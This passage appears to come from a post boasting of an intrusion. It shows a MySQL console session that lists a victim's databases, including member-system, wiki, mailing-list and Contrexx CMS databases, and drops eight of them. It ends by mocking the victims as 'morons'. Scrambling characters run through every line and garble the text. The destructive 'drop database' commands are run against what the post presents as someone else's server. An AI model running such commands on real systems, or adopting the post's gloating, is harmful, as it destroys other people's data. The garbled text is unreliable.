| astanet_ads | & D X9 Y+ W c% C. i0 W| astanet_mailing_lists | 0 S/ a4 a* Z% p1 G# W| astanet_mediawiki |" \* _- I9 k. |5 z: i3 T o4 Z9 F7 M# @ ]
| astanet_membersystem |* ~6 ]+ v$ j. L/ B. `; E
| com_contrexx | 3 q( m: s( {" W. N/ o; b/ N7 V x- e. C8 Q| com_contrexx2 |! w7 k9 Z9 j. f1 t- l. ^/ P
| com_contrexx2_live |' |& W0 s- f( {3 [# k
| da_roundcube | - x/ S: }2 C/ R5 h| dolphin |. M$ j8 a4 B- Q2 m7 e7 l* Y% `1 D" S
| ideapool | 1 r! k5 i1 H) u$ X- A O6 d| mysql | 1 i; I, l2 x% v1 ?# i2 G% |: w3 n| test | " C' Y" n- }$ Y- e; E$ F| yourmaster |9 C& Y \% T+ a4 i, h! L2 P$ s
+———————–+ ( E% E+ o7 k5 O5 T$ B! T14 rows in set (0.03 sec) 5 D4 O. F: z* Q9 B$ ]2 E" q4 I : E# u' M& O2 mmysql> drop database astanet_membersystem;7 e% y5 ?8 O9 n* M1 }
droQuery OK, 46 rows affected (0.81 sec)- ^3 a5 }' o- X! c, R3 p& e
( V. A8 C$ q- B# Gmysql> drop database com_contrexx2;5 ?& i) n, X2 X+ J/ \" N" |
Query OK, 237 rows affected (2.23 sec)& \5 F' t4 y2 w K
* j% `1 t( @& h
mysql> drop database com_contrexx2_live;" `; W, t7 D7 _8 n
Query OK, 227 rows affected (7.63 sec) + E" L3 D- B- W# s" I9 C8 M5 i" w* C% c. G4 {
mysql> drop database ideapool;1 E- A$ G5 N0 ~# d) Q) i+ P
Query OK, 69 rows affected (0.19 sec)* A' q& x! Z/ e. z* d" K& ]/ V
" D8 n" X3 f5 ?1 W8 ^mysql> drop database yourmaster;5 b4 u. B+ n8 Y1 t3 Y2 L2 u$ u
Query OK, 158 rows affected (0.55 sec); r3 g0 _8 V% l
) r5 |" h* \0 Omysql> drop database astanet_ads;4 n$ y. ~, p# l& S$ ?
Query OK, 9 rows affected (0.11 sec)4 \4 F* _' u, z% b( v
/ Z9 J4 I' n }" o
mysql> drop database astanet_mailing_lists; 7 r9 \# A2 Q+ Z7 ]4 x' ?7 IQuery OK, 24 rows affected (1.47 sec)" n1 s" H( B, c/ s6 z
, h4 K8 I3 g/ s* Y
mysql> drop database astanet_mediawiki;1 J3 O) @6 |9 Q" }0 L/ t. W
Query OK, 31 rows affected (0.51 sec) 5 G, d5 m1 G- E" n. s6 i M9 I ' S; ~" z o x# c5 V; B/ G( qmysql> show databases; $ \* U! b/ V5 r: h: }+——————–+. N7 g( b" B4 D& a
| Database |# u+ J; v: L. {7 Y( O( d
+——————–+ : C9 g8 p' e: o7 r* N7 b' {# H| information_schema |: o0 p% ~4 a: t ?$ v8 j
| da_roundcube | 8 z8 H2 ]% p& u) A4 d4 K Q| dolphin |" p% Y; L% n, O6 w' n* X4 H" t3 A
| mysql |2 z- N. \$ y5 U
| test | # S3 L; G8 Z3 K+——————–+ ?& n+ L; A1 Z$ ]/ a" e! L5 rows in set (0.00 sec)+ X2 f% [1 M; e( V1 ?8 c
. @, R8 t7 Z* eWhat a journey! We’re not sure exactly why the “Terminator” had any influence on4 Q# Q! z8 x; t; E
their naming (conventions) but we’re sure Arnold himself wouldn’t be in the 9 ]1 t( ?! `! swrong to say this pack of morons *wont be back*.2 [# b2 I d, N0 ~- X4 d